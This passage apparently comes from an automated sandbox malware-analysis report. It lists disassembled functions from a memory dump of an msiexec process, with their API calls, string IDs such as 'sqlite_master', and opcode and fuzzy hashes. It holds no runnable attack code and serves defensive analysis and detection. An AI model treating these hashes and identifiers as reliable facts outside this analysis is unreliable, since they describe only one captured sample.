                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                    Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00412057
                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                    • String ID:
                                                                    • API String ID: 3550944819-0
                                                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                    Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • free.MSVCRT ref: 0040F561
                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$free
                                                                    • String ID: g4@
                                                                    • API String ID: 2888793982-2133833424
                                                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: @
                                                                    • API String ID: 3510742995-2766056989
                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                    • memset.MSVCRT ref: 0040AF18
                                                                    • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                    • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004144E7
                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                    • memset.MSVCRT ref: 0041451A
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1127616056-0
                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                    • memset.MSVCRT ref: 0042FED3
                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: sqlite_master
                                                                    • API String ID: 438689982-3163232059
                                                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3917621476-0
                                                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                    • String ID:
                                                                    • API String ID: 822687973-0
                                                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                    • malloc.MSVCRT ref: 00417459
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                    • free.MSVCRT ref: 0041747F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 2678498856-0
                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Item
                                                                    • String ID:
                                                                    • API String ID: 3888421826-0
                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00417B7B
                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                    • String ID:
                                                                    • API String ID: 3727323765-0
                                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F673
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00402FD7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                    • strlen.MSVCRT ref: 00403006
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                    Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$CloseHandle
                                                                    • String ID: General
                                                                    • API String ID: 3722638380-26480598
                                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                    • String ID:
                                                                    • API String ID: 764393265-0
                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Time$System$File$LocalSpecific
                                                                    • String ID:
                                                                    • API String ID: 979780441-0
                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                    • String ID:
                                                                    • API String ID: 1386444988-0
                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateMessageRectSend
                                                                    • String ID: d=E
                                                                    • API String ID: 909852535-3703654223
                                                                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$memcpywcslen
                                                                    • String ID: "
